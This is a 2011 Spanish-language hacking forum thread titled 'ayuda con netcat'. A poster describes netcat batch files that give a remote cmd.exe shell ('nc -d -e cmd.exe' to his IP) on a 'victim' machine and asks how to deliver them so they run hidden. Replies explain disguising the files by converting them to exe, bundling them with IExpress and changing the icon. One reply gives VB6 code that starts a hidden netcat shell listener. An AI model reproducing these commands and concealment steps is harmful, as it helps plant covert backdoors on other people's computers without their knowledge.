elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ayuda con netcat...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con netcat...  (Leído 2,925 veces)
fREEps

Desconectado Desconectado

Mensajes: 1



Ver Perfil WWW
ayuda con netcat...
« en: 18 Mayo 2011, 19:07 pm »

Hola, para empezar me presento, soy free, y queria ver si me podian solucionar una duda. Sucede que yo tengo mi nc.exe (netcat) y hice 2 .bat, uno para la victima (que lo tiene q abrir en una carpeta con el nc) y otro para mi. Uno es para abrir el puerto 80 (tambien hice con 6000) y le puse 'nc -vv -L -p 6000 u 80' obvio sin el u 80 y sin los '', bueno ahora sucede q el otro lo hice para q se conecte a mi computadora, que le puse 'nc -d -e cmd.exe x.x.x.x 6000 u 80' sucede que cuando puse mi ip privada en este documento que lo vamos a llamar 'h.bat' sucede que cuando puse en h mi ip PRIVADA, me pude conectar a una computadora q usaba mi red wifi, una de mi casa (lan wifi) y me anduvo, pude manejarla con la shell y todo. Pero no podia conectarme con un amigo q tambien sabe del tema, no nos podiamos conectar por INTERNET, entonces encontre que en ves de la IP PRIVADA le tengo q poner la IP PUBLICA, bien, entonces que hago? le puse la ip publica, y sucede que no me pude conectar mas a mi computadora, y antes podia con ip privada,. bueno queria saber si me pueden responder eso, yase que es medio confuso, pero no me se expolicar.




OTRA DUDA:_ como hagop para mandar 'h.bat' y 'nc.exe' a una victima, y que se le abra solo y que se le ejecute en modo hide solo. GRACIAS Y SALUDOS A TODOS...



PD:_ perdon la ortografia

 //ride\\
En línea

It's time to hack...
Lavacaloca

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: ayuda con netcat...
« Respuesta #1 en: 18 Mayo 2011, 20:02 pm »


Para iniciar el nc y el bat en mod HIDE:

                al h.bat lo pasas a .exe con el programa Bat to exe Compiler, y no va a salir más Ms-Dos. Y después con el Iexpress los compilas a los dos archivos (nc.exe y h.exe) y le pones la opción de ocultar con el Iexpress, y listo. Si queres le cambias el icono con algún programa para hacer dicha tarea, asi queda más "inocente". 
En línea

Sigo buscando información y/o posibles soluciones para abrir un puerto en el modem Huawei echolife Hg520c :(
k0ws

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: ayuda con netcat...
« Respuesta #2 en: 18 Mayo 2011, 20:11 pm »

Veamos,para netcat creo que lo tuyo es problema de puertos,y segundo,si quieres un buen "HIDE" usa esto en VB6:

Código:
Dim Hide as string
Hide = shell("nc -l -p 1234 -e cmd.exe",vbhide)

Luego iexpress a el Exe creado con vb6 y netcat y listo.
En línea

Lavacaloca

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: ayuda con netcat...
« Respuesta #3 en: 18 Mayo 2011, 23:27 pm »

Veamos,para netcat creo que lo tuyo es problema de puertos,


Y como se soluciona eso? A mi me pasa exactamente lo mismo, y abrí unos puertos con el firewall pero nada, y note que en el firewall , los puertos ftp, http, etc., no están activados :O, pero mi internet funciona correctamente.
En línea

Sigo buscando información y/o posibles soluciones para abrir un puerto en el modem Huawei echolife Hg520c :(
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines